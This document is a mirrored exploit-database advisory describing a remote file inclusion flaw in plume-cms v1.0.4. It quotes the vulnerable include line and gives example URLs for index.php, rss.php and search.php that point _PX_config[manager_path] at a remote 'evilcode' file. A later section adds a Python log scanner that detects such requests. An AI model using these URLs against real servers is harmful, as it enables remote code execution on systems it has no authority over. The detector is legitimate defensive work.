plume-cms v1.0.4 Multiple Remote File include

CVE: CVE-2007-3965
Category: CWE-829
Price: $500
Severity: High
Author: nuTc4k
Risk: High
Exploitation Type: Remote
Date: 2006-07-25
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006070071

Below is a copy:

plume cms  v1.0.4 Multiple Remote File include

-------------------------------------------------

Discovered By CrAsh_oVeR_rIdE

Arabian Security Team

-------------------------------------------------

site of script:http://www.plume-cms.net/

-------------------------------------------------

Vulnerable: plume cms  v1.0.4

-------------------------------------------------

vulnerable code:

----------------------

include $_PX_config['manager_path'].'/frontinc/class.template.php';

_PX_config[manager_path] parameter File include

-------------------------------------------------

vulnerable files  :

--------------------

index.php

rss.php

search.php

-------------------------------------------------

example:

www.example.com/(path)/index.php?_PX_config[manager_path]=http://evilcode.txt?

www.example.com/(path)/rss.php?_PX_config[manager_path]=http://evilcode.txt?

www.example.com/(path)/search.php?_PX_config[manager_path]=http://evilcode.txt?

-------------------------------------------------

Discovered By CrAsh_oVeR_rIdE

E-mail:KARKOR23 (at) hotmail (dot) com

Site:www.lezr.com

Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3, mr-hcr AND ALL LEZR.COM Member
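
Detection example (added here, not part of the original advisory or of Plume CMS): a log check that flags requests to the three listed scripts whose query string supplies _PX_config[manager_path], a key that should only ever be set server-side. The log format (Common Log Format), the sample lines and the names classify and scan are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl

# Scripts the advisory lists as vulnerable; "" covers a bare directory
# request, assumed here to be served by index.php.
AFFECTED = {"index.php", "rss.php", "search.php", ""}
# The config key as it appears once percent-decoding is done.
KEY_RE = re.compile(r"^_PX_config\[\s*['\"]?manager_path['\"]?\s*\]$")
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)
# Request field of a Common/Combined Log Format line.
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines, not taken from a real server
    '192.0.2.10 - - [25/Jul/2006:10:00:00 +0000] "GET /cms/index.php?_PX_config[manager_path]=http://files.example.net/x.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [25/Jul/2006:10:00:05 +0000] "GET /cms/rss.php?_PX_config%5Bmanager_path%5D=manager HTTP/1.1" 200 128',
    '192.0.2.12 - - [25/Jul/2006:10:00:09 +0000] "GET /cms/search.php?q=manager_path HTTP/1.1" 200 2048',
    '192.0.2.13 - - [25/Jul/2006:10:00:12 +0000] "GET /cms/other.php?_PX_config[manager_path]=http://files.example.net/x.txt HTTP/1.1" 404 0',
]

def classify(log_line):
    """Return 'remote-include', 'override' or None for one access-log line."""
    m = REQ_RE.search(log_line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    if path.rsplit("/", 1)[-1] not in AFFECTED:
        return None
    verdict = None
    # parse_qsl percent-decodes keys and values, so %5B/%5D forms match too.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if KEY_RE.match(key):
            if SCHEME_RE.match(value):
                return "remote-include"  # value is a URL, as in the advisory
            verdict = "override"  # server-side config key set by the client
    return verdict

def scan(lines):
    """Return (verdict, line) pairs for every flagged line."""
    return [(v, line) for line in lines if (v := classify(line))]

if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_LOG):
        print(f"{verdict:15} {line}")
```

Only the query string is inspected, so the check covers what an access log records and nothing sent in a request body.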
